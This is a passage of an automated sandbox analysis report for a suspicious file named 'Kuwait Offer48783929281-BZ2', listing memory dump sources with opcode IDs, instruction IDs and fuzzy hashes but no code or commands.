                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 862439252904c18a0840b7cf2c8cf6b420c015624ff1c2ea283ab7264ed82e98
                                          • Instruction ID: 138bedd38e1bc4494f8f38d6e2db4362646ea89b351405e180f5e72cd0a51d46
                                          • Opcode Fuzzy Hash: 862439252904c18a0840b7cf2c8cf6b420c015624ff1c2ea283ab7264ed82e98
                                          • Instruction Fuzzy Hash: 06E0127195220CEFCB51EFF489047AEB7AC9B47204F4445A9840597110EE715A10E792
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb382b05d3a8736b1e3e7280358860594e2171bab112efd9c45b23c9daceac96
                                          • Instruction ID: 3e53b2a89de994f72342078e50ed329222b037152d96234db5d2cef804d2557b
                                          • Opcode Fuzzy Hash: fb382b05d3a8736b1e3e7280358860594e2171bab112efd9c45b23c9daceac96
                                          • Instruction Fuzzy Hash: 0CF0FDB4D4022A8FDB65CF14E944BA9BBB9BB48341F1051E9D659B3254DB345E818F04
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aff6a7147d6bece43caf86e5253578e7223fb0a8a5c667622b8510ffdbf03036
                                          • Instruction ID: 258fd68078b5a9e72727c350b7e52dd73bf0f93449f0329535a88c1b0f5a37ff
                                          • Opcode Fuzzy Hash: aff6a7147d6bece43caf86e5253578e7223fb0a8a5c667622b8510ffdbf03036
                                          • Instruction Fuzzy Hash: DDE01270E00209EFDB00DFB5D95567EB7BAEB45304F10C6A9EA09D7244D9715F0097C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5046131e56ed2c24767d90eb3fdf813bc409c97c464d05d55e303a48244338f0
                                          • Instruction ID: 4da94c3480c949f272f9d51514f72ac61cfeea096c0b341d86b66d3186b3677e
                                          • Opcode Fuzzy Hash: 5046131e56ed2c24767d90eb3fdf813bc409c97c464d05d55e303a48244338f0
                                          • Instruction Fuzzy Hash: 11E01270A00209EFCB40DFA8D95069E77FAEB45304F1085A8D50DD7304D9315F049791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8a0a518673a01940b431aa38d9428d0bdc526cdaf1b7ffd77be02febd490c57
                                          • Instruction ID: 081c7727e3bffb946073cba43e015349297269f07d8fffef3928dd494d9d1695
                                          • Opcode Fuzzy Hash: f8a0a518673a01940b431aa38d9428d0bdc526cdaf1b7ffd77be02febd490c57
                                          • Instruction Fuzzy Hash: 92E0E270D1230CEFCB54EFB8D5492ADBBB9AB46606F2041EDC80893350EB319A80DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee2059885fa5108ff75edb009cd91aacfa67cba5b13d62f6b1ef27c0d27f92b1
                                          • Instruction ID: e0d581a7e40518fd960b727420306265c4fdb5e0cf64461b6c5adbc1737d8c43
                                          • Opcode Fuzzy Hash: ee2059885fa5108ff75edb009cd91aacfa67cba5b13d62f6b1ef27c0d27f92b1
                                          • Instruction Fuzzy Hash: 6DE01771594348DFCB95CF28D850A857BB2EF5A21434242E7E885C7276C2349C43CB16
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39dd9c50b3df9c1de2543bf79fa0eb929b112df7590f9b68b68ea8f5fa997ae7
                                          • Instruction ID: b9927ce6f5cfbea87e66d925444dd27223aed3b715d452d48256b692e8889eae
                                          • Opcode Fuzzy Hash: 39dd9c50b3df9c1de2543bf79fa0eb929b112df7590f9b68b68ea8f5fa997ae7
                                          • Instruction Fuzzy Hash: 50E04F78904119CFC790DF14D9646DEB7B6FB59304F008099CA4A73344CB741D95CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a3e6bfa85084898430103ef8fd71fe3f77e24056e6f66eea7e750fcc9fbc815
                                          • Instruction ID: 47de2d74299c2bd5e652024433f302d04d093a052c14b870b66b098773a8c5e6
                                          • Opcode Fuzzy Hash: 5a3e6bfa85084898430103ef8fd71fe3f77e24056e6f66eea7e750fcc9fbc815
                                          • Instruction Fuzzy Hash: 96E0E578900224DBC790DF64D88879CB7B6EB8A305F50809AC90EB7344CF341D89CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56ce3d960a06e224b485fdeebd27a0a9ed7f9bf904d0ecc68a634f7e3d12f680
                                          • Instruction ID: 397ffd4ae113464e2007817801af2d7754bb10db07f41d68b84ffc2ceb0d1bc1
                                          • Opcode Fuzzy Hash: 56ce3d960a06e224b485fdeebd27a0a9ed7f9bf904d0ecc68a634f7e3d12f680
                                          • Instruction Fuzzy Hash: A8E01A7CE01129CFD714DF14DA44B9DB7FAEB4A304F50809C854AA3344CA341D458F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee05fd9f2ffc98272225e1b8bbf986648631d73996065954101adb4cf014848e
                                          • Instruction ID: 4a54d4709b69d492b0098079e11f1f1cc7427feeb8c0e31e3cc6574c12750c6e
                                          • Opcode Fuzzy Hash: ee05fd9f2ffc98272225e1b8bbf986648631d73996065954101adb4cf014848e
                                          • Instruction Fuzzy Hash: DDD01231509312DBD715DB18E450E8B73A69FC0300B04CE2DA14A47525DF70ED958BC5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6905d7ce24a1e584d53ffa62fe075001ca81523e19ccf3ed579254d3deaf3c62
                                          • Instruction ID: 37d9ed1dd055185470975b3d8737d331b41277db13b1f5718d1406bd1f0c2164
                                          • Opcode Fuzzy Hash: 6905d7ce24a1e584d53ffa62fe075001ca81523e19ccf3ed579254d3deaf3c62
                                          • Instruction Fuzzy Hash: 24D05E311093846FC3028B68E800C927F78EE0621030581D2F8408B233C622E924C7A1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f9959223be0089c5e3770a64ae416ef1b1e3475b4a41b9189a4a9ab3cdd5cc0
                                          • Instruction ID: a67d78f273009cbfb52aa53d8ab63992fd9f444a6428c6409898c594237d564e
                                          • Opcode Fuzzy Hash: 1f9959223be0089c5e3770a64ae416ef1b1e3475b4a41b9189a4a9ab3cdd5cc0
                                          • Instruction Fuzzy Hash: 1FE092B8A01268CBDB20CF24C944BD9BBF4AB08710F0041D9A549B7280C2B09E80CF04
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b50c6129ddb0804b580cbc0172ab71011e711796f0390a17d86a45f3edaacee8
                                          • Instruction ID: 7be0323a6ebb180a80fbd0a4b352eab7397b1dac0a7d81c6acf45e8a36731019
                                          • Opcode Fuzzy Hash: b50c6129ddb0804b580cbc0172ab71011e711796f0390a17d86a45f3edaacee8
                                          • Instruction Fuzzy Hash: 91D017B561632ACFEBA09F60D458B69377AFB44300F108A94C80E77300DB398E848F82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc2e1bec4c51316e5e975205c14f0e90eaf08e1fdeea67f5e1aece5564571631
                                          • Instruction ID: 7be0323a6ebb180a80fbd0a4b352eab7397b1dac0a7d81c6acf45e8a36731019
                                          • Opcode Fuzzy Hash: dc2e1bec4c51316e5e975205c14f0e90eaf08e1fdeea67f5e1aece5564571631
                                          • Instruction Fuzzy Hash: 91D017B561632ACFEBA09F60D458B69377AFB44300F108A94C80E77300DB398E848F82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd03524f6eb06eb13731123211c5cf420cec4465e6cdac6e30a2ded7f64894c5
                                          • Instruction ID: 37012ebd2aec37e806a6c3bc8eab0730a268be544463357137bb25b61bd6ddd6
                                          • Opcode Fuzzy Hash: fd03524f6eb06eb13731123211c5cf420cec4465e6cdac6e30a2ded7f64894c5
                                          • Instruction Fuzzy Hash: 71E0FE74D052A88FCBA0CF24D84879CBBB4BB09355F0085EA980EB2244DB741A84CF41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bae63c52ee96e3021922e80108252b86179201e42d3b6366740f8ec921b2486a
                                          • Instruction ID: 76b2f4e4162a325a5d2ec43611728ad534b25ce6bd465061323947eb848d01b6
                                          • Opcode Fuzzy Hash: bae63c52ee96e3021922e80108252b86179201e42d3b6366740f8ec921b2486a
                                          • Instruction Fuzzy Hash: 0EE07EB4A0222CCFEB30DF28D948799BBB5BF89314F0051DAD48DA2242D7700E80CF42
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: adc77e23af4b07c804d781d0d4bfa8f5af05824b04e5948a40fb0f5aa2de9143
                                          • Instruction ID: 9dc31d4fa9ef6e2a1f704d4ab403f7d7c6d3f5952a45c429826ef687f300d646
                                          • Opcode Fuzzy Hash: adc77e23af4b07c804d781d0d4bfa8f5af05824b04e5948a40fb0f5aa2de9143
                                          • Instruction Fuzzy Hash: 5BD05E35105281AFC726C721D8848867F369F92204B0440A7F004C60538736492AC7A1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dab89d75f2cce4c777fda4fc95eef3928a0cc15e51a1aadfed04630e7550cbce
                                          • Instruction ID: 274348022f96c59926564ee5e022e17b0eaa0aeca49105a266a9ac2b0231bc80
                                          • Opcode Fuzzy Hash: dab89d75f2cce4c777fda4fc95eef3928a0cc15e51a1aadfed04630e7550cbce
                                          • Instruction Fuzzy Hash: 0EC08C200AB6098FD2B82254640C3B0B29C5B07302F087400820D02061C6606040CA85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be225275cb8e0a71f518f9799ad861465b927df59bd8423d5aa8b0eb2d5e17ad
                                          • Instruction ID: 5b6eb15106f442dae3b0f7d08f6ddda7f63f094391517275271c20fccf1b3f96
                                          • Opcode Fuzzy Hash: be225275cb8e0a71f518f9799ad861465b927df59bd8423d5aa8b0eb2d5e17ad
                                          • Instruction Fuzzy Hash: 5EC08C3146A3803FDF2203200C15F923FA86B52702F0500C2B240990C285980A04C2B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21c63f419468e21f3965838062f68bd4ff21c5ba52a341400256e8bfdaf28344
                                          • Instruction ID: b072de2298a3a43877065d6ac0cc460857fc1090b7ce4575026ac3bdcd0d286b
                                          • Opcode Fuzzy Hash: 21c63f419468e21f3965838062f68bd4ff21c5ba52a341400256e8bfdaf28344
                                          • Instruction Fuzzy Hash: ABD0C7B4906355CFEB518F24D554B597B75E744245F0086A4C50D63204DB35CE888F45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c21d2f81a639e5218d8d302aee2682829a03e9656d11e301071e61f621c8dd4
                                          • Instruction ID: fe72adeb161596c2e7545de31c1b8ec41cfe48f8d9f87a1a6d26d971a45939cf
                                          • Opcode Fuzzy Hash: 3c21d2f81a639e5218d8d302aee2682829a03e9656d11e301071e61f621c8dd4
                                          • Instruction Fuzzy Hash: AED0C93910A2C1AFC302DB50DC60D12BFB5AF96205719C4DEE5994F267DB339813EB12
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 38d0e1661e41d1fdfcadf7b398f944e292cd56b6c724601fcba945fb589d4aaf
                                          • Instruction ID: 78f4a0a9bbb6b2e54cc80fa7f78cb5bf531fb152af36f32893d01599d4bd4f85
                                          • Opcode Fuzzy Hash: 38d0e1661e41d1fdfcadf7b398f944e292cd56b6c724601fcba945fb589d4aaf
                                          • Instruction Fuzzy Hash: 56C0122808AAA0AFC3029A72CC90480FBB4AD0210035484ABE4A0C74A2C238642A87B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b3fd7707ceec4f6c08edc4d22bf23ce71b25f2f6e6e6e0382beb1040d8ab06a
                                          • Instruction ID: d77b5c9dc049779828fc6bc8e0f16dfc855ecf49cacf08aac8564687c3abcb56
                                          • Opcode Fuzzy Hash: 5b3fd7707ceec4f6c08edc4d22bf23ce71b25f2f6e6e6e0382beb1040d8ab06a
                                          • Instruction Fuzzy Hash: 47C012319493D8DFCB355B7068051C93F355F02360F0480E6D846C906295714404C711
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d1994604892b51cb636b75b838d4710e40d8bc633417664236d6ad95cc7372ea
                                          • Instruction ID: 88db9a564c53a8330aa3bdd75905a17e4d9db6cb14feae9483c2d03ccb6f386d
                                          • Opcode Fuzzy Hash: d1994604892b51cb636b75b838d4710e40d8bc633417664236d6ad95cc7372ea
                                          • Instruction Fuzzy Hash: 21C00235640214CF8204DF59E484C15B3B9EB4C61535141A5ED1A57331C739FC01CA80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12a29206f41fe1b47632a530b49da3818bae8a6e8da16cc9018cbfeb8bf61940
                                          • Instruction ID: 1871f9312e900b19b04fb836af9725401c448e1b1190f2e51fb98ca40ed8d0fa
                                          • Opcode Fuzzy Hash: 12a29206f41fe1b47632a530b49da3818bae8a6e8da16cc9018cbfeb8bf61940
                                          • Instruction Fuzzy Hash: 27C00276E1001A9A8B00DAD9E9508DCBB74EB94321F404026E215A7104D63015268B54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6458b0b9a3038b372344ffc2e1a72fae0ca14cc1a12abf3dc9bc0922a71c94d9
                                          • Instruction ID: 85ac4a8c80220a2d6433fee990862f9bdc6ec387f236a9ca41a627bfebcb2a9b
                                          • Opcode Fuzzy Hash: 6458b0b9a3038b372344ffc2e1a72fae0ca14cc1a12abf3dc9bc0922a71c94d9
                                          • Instruction Fuzzy Hash: 0DC08C70104100EBE3045F60D0486197A26FB82708F004029820637584CA380C8A8791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6797abd876539e992ea594b089ac96d7b512da85ac89c4d5cd5d25b8955722c
                                          • Instruction ID: aadd3a106d1bd84d3dcabad3d00fd6b05f28ed4bda3fab5241e7cf6721a7c434
                                          • Opcode Fuzzy Hash: d6797abd876539e992ea594b089ac96d7b512da85ac89c4d5cd5d25b8955722c
                                          • Instruction Fuzzy Hash: 9DB0123B640048CADA284984B0080DCF738D380777F000062F20981C00833005684740
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8fe23bff1bb547c9bcf28a1cdc08cf99054ac6aad32bf346bdd322935a6726be
                                          • Instruction ID: 65892228ee38d07447de99293874dce1ea5f9058804d66d5b0f3ccdfc3e49163
                                          • Opcode Fuzzy Hash: 8fe23bff1bb547c9bcf28a1cdc08cf99054ac6aad32bf346bdd322935a6726be
                                          • Instruction Fuzzy Hash: 27B09236000208ABCB049B84E984859BB6DAB58710B008025F609062128B32A922DB94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ce7dc5f4c6b15fcba1589c61eef95e74f23ba4a22d188af7b68b7d8bd3e672e0
                                          • Instruction ID: a8b770a49db84735e5a186a81d55297c4a8372bfc2b9f23d91e6814ca85b2b39
                                          • Opcode Fuzzy Hash: ce7dc5f4c6b15fcba1589c61eef95e74f23ba4a22d188af7b68b7d8bd3e672e0
                                          • Instruction Fuzzy Hash: 4DA01132080308CFC2382BA0B80E0083B2EAB00322B8000A0A00FC8028AEA028008B88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: [$f
                                          • API String ID: 0-3398516104
                                          • Opcode ID: b11c0434696036e51e44d35d19a5f1345f0e0a6f138caf322e191c6be76da9a5
                                          • Instruction ID: bd2f5601ba1c6f9a1426f296d435690e6a38ede277aa94439a45c0cfd5572987
                                          • Opcode Fuzzy Hash: b11c0434696036e51e44d35d19a5f1345f0e0a6f138caf322e191c6be76da9a5
                                          • Instruction Fuzzy Hash: D9418CB1E016588BEB5CCF6B8C4479AFAF7AFC8200F14C1BA981CA6255EB3406468E40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: W$w
                                          • API String ID: 0-2839274526
                                          • Opcode ID: e08923df36334f9d52409d1c184efc8d96b7e4b420d77a707bf7082f585a4cc2
                                          • Instruction ID: 73effc35dbd6502144902d13bf60fe830229292795d96419c9b1706a156d0f84
                                          • Opcode Fuzzy Hash: e08923df36334f9d52409d1c184efc8d96b7e4b420d77a707bf7082f585a4cc2
                                          • Instruction Fuzzy Hash: D341C571D156198BEB68DF67D94879EBAF2AFC8300F54C1BAC80CA6254DB740A85CF44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: v
                                          • API String ID: 0-1801730948
                                          • Opcode ID: b83e251a2a23f4bc292346d34c9260241768ed783937d9e06410dcf1a046d3b1
                                          • Instruction ID: b3d806eb360a6859e5111e6d3ca598702f1294032e231099e08021a22979ff3c
                                          • Opcode Fuzzy Hash: b83e251a2a23f4bc292346d34c9260241768ed783937d9e06410dcf1a046d3b1
                                          • Instruction Fuzzy Hash: 02512BB1D056588BEB29CF2B8D442CAFAF7AFC9300F44C1FA954CA6225DB700A858F51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d07220886f84d973fefd0dea6b965772f21dd7504fded1729afafb491b31329
                                          • Instruction ID: b540d6dde6e455d4f02a9a1794878d0f575db9dba7f4d35ae84fbffdc264ceec
                                          • Opcode Fuzzy Hash: 3d07220886f84d973fefd0dea6b965772f21dd7504fded1729afafb491b31329
                                          • Instruction Fuzzy Hash: B5120734B10215CFDB54DF28C894AAAB7F2BF89750B1584A8E906DB375DB35EC41CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe684ff2c93da9118c4d42d6a6bd2d2671536ab13523340ccb72c3774fea22b5
                                          • Instruction ID: 75fae4f41fb17d3ba5e9243569a479d2b3b61ee0639a50c02fcdaf3a82b8d18d
                                          • Opcode Fuzzy Hash: fe684ff2c93da9118c4d42d6a6bd2d2671536ab13523340ccb72c3774fea22b5
                                          • Instruction Fuzzy Hash: 5012D971E106188FDB54CFAAC980A9EFBF2BF88304F25C569D458EB219D7349946CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4fb44ca163d90c8a2e039baf5eab3b3216aba2b304a147deab785019d6006ac
                                          • Instruction ID: 31931a430fa7c6f1c2c0a72b69d88f62e1bce41dec277ca4288c7372c74aa6b0
                                          • Opcode Fuzzy Hash: d4fb44ca163d90c8a2e039baf5eab3b3216aba2b304a147deab785019d6006ac
